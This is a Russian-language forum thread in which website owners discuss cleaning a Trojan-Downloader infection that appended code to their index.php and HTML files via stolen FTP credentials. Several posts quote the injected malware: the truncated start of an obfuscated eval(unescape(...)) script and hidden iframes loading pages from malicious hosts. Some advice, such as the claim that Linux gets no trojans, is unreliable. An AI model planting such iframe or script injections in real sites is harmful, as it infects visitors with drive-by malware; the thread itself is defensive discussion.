Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[izstas]

Попробуйте отключить gzip

[Палыч]

Prosvetlenie
Рекомендую провериться на наличие в коде файлов "левых" включений кода.

[модем]

У меня была такая дрянь. Вирус. В конце почти каждого файла была строка типа <?php echo iframe......?>. Вылечил восстановлением из резервной копии.

[Prosvetlenie]

Спасибо всем ) буду лечить

[Prosvetlenie]

Дело решил так: в корневой папке форума во всех пхп файлах в конце кода добавился код вируса... начинался он так:

Код: Выделить всё

<!-- [ 75e2d43649934e330eb179ccbf91445a ] --><script>eval(unescape('function%20gGYuu%28hAI%29%7Bfunction%20oJHWp%28hEIh%29%7Bvar%20tXXEPU%3D0%3Bvar%20hReZ%3

и так далее.... довольно большой кусок... Удалил, и все работает Всем кто помогал - спасибо!

[DK7]

Prosvetlenie
обязательно поменяйте пароли к фтп. иначе через недельку вирус сново постучится).
И не держите пароли в фтп клиенте.

[DJ Sample]

Та же самая фигня
В конце файлов index.php и index.htm добавляется код

<?php echo '<div style="visibility:hidden"><iframe src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></iframe></div>'; ?>

Посмотрел в панели управления в логах авторизации - там по фтп куча авторизаций с разны ип, точно не моих.
Код вычищаю, пароль на фтп не менял, сегодня сменю.
Но может кто-нибудь в курсе, что за вирус таким занимается, и где он, на моём компе сидит?
Стоит антивирь norton antivirus, что-то ничего не находит..

[Alek$]

DJ Sample
поставьте еще какой-нибудь антивирус, обязательно смените ВСЕ пароли и проверьте сайт на наличие левых файлов.
А троянов, которые крадут пароли, существует сотни.

[Mic70]

Блин, ну что за люди! Я же писал : поставьте CHMOD444 на все файлы index и ВСЁ!!! У меня с тех пор НИ РАЗУ не было этих троянов! З.Ы. Я, в отличии от Касперского, денег не беру!

[DK7]

я так работаю .. вирус ворует пароли от фтп. Через коммандеры. В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля.. Пароль запоминается и воруется трояном. Но он не верный.
При последующем соединении, соответственно пишет что неверный пароль, жмем на заново ввести пароль и просто трем последний символ , стираем бэкспейсом. Все тут же коннектится.
Вирус в таком случае бессильный. Не надо менять атрибуты доступа к файлам, отпадают ухищрения и т.д.
Все довольно просто. ИМХО.
Пока за месяцев 10 ни разу проблем не возникло...

Добавлено спустя 2 минуты 7 секунд:
Добавлю, перед этим нужно вычистить все файлы от вредоносного кода. А потом вполне то.

[Alek$]

Давайте еще и я выпендрюсь. У меня стоит Linux, под него трояны не пишут и я могу хранить пароли где угодно. Но это еще не все. Файл с паролями у меня шифруется алгоритмом GPG, 1024-битным ключом. Ни разу за всю жизнь никто не спер у меня пароля.

А если серьезно, то просто не храните пароли в стандартным хранилищах. Трояны тупые и даже незашифрованный файлик где-нибудь в моих документах не найдут, если вы, конечно, не назовете его passwords.txt. А еще лучше просто помнить самые важные пароли и не записывать нигде.

[FladeX]

Alek$, зачет
У меня тож линукс, до сих пор ни одного инцидента не было

[stealth0000]

Вредоносный фрейм:

Код: Выделить всё

<iframe src="http://liteto***catesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>

Будет добавлен в сегодняшнее обновление каспера.

[Alek$]

От греха подальше "побил" ссылку.

[FladeX]

В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля..

Кстати хакеры сейчас прочитают и кончится халява